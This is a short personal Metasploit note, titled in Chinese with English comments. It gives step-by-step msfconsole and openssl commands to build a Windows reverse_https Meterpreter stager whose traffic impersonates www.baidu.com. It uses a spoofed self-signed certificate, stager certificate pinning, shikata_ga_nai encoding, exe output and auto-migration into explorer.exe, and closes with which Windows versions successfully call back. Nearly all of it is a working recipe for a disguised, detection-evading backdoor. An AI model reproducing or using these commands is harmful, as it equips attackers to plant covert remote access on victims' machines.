metasploit使用笔记


开启

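# Metasploit: build a windows/meterpreter/reverse_https stager whose traffic
# masquerades as www.baidu.com (self-signed cert + stager cert pinning).
# Every line here is an msfconsole command except the openssl step, which is
# an ordinary shell command.
db_connect ./database.yml   # attach msfconsole to its database (newer releases spell this `db_connect -y ./database.yml`)

use payload/windows/meterpreter/reverse_https
# The Override* options only change what the stager writes into its request
# (URL host / Host header and port); they do NOT change where it connects.
# LHOST/LPORT of the real listener are not set anywhere in this snippet —
# add e.g. `set LHOST <listener-ip>` before `generate`, otherwise generate is
# likely to refuse with a missing-option error.
set OverrideLHOST www.baidu.com
set OverrideRequestHost true
set OverrideLPORT 443

# Run in a system shell, not inside msfconsole (multi-line `\` continuation).
# -nodes leaves the private key unencrypted; HandlerSSLCert expects key and
# cert concatenated into a single PEM. Treat the .pem as a secret: anyone who
# holds it can impersonate the handler to these stagers.
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
    -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.baidu.com" \
    -keyout www.baidu.com.key \
    -out www.baidu.com.crt && \
cat www.baidu.com.key  www.baidu.com.crt > www.baidu.com.pem && \
rm -f www.baidu.com.key  www.baidu.com.crt

set HandlerSSLCert ./www.baidu.com.pem
# FIX: msfconsole `set` takes "NAME VALUE", not "NAME=VALUE". The original
# `set StagerVerifySSLCert=true` is parsed as an option literally named
# `StagerVerifySSLCert=true` with no value, so verification was never enabled.
# With this option the stager pins the hash of HandlerSSLCert at generate
# time — regenerating the .pem means regenerating the exe as well.
set StagerVerifySSLCert true
set EnableStageEncoding true

# Old-style `generate` flags (-t output format, -f output file); newer
# msfconsole uses `generate -f exe -o /tmp/baidu.com.exe ...` instead.
# -b excludes 0x00/0xff from the encoded stager, -i 2 = two encoder passes.
generate -E -b '\x00\xff' -f /tmp/baidu.com.exe -t exe -a x86 --platform win -e x86/shikata_ga_nai -i 2

# AutoRunScript is an option of the handler (exploit/multi/handler), not of
# the payload module selected above; set it there, together with the same
# SSL/Override/StageEncoding options, before starting the listener.
set AutoRunScript post/windows/manage/migrate NAME=explorer.exe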

实测 Windows Server 2003 SP2 上的 stager 无法回连成功（推测是 2003 的 SChannel 不支持 handler 协商的 TLS 版本/密码套件，未验证）；Windows Server 2008、Win7、Win10 均可正常回连。

引用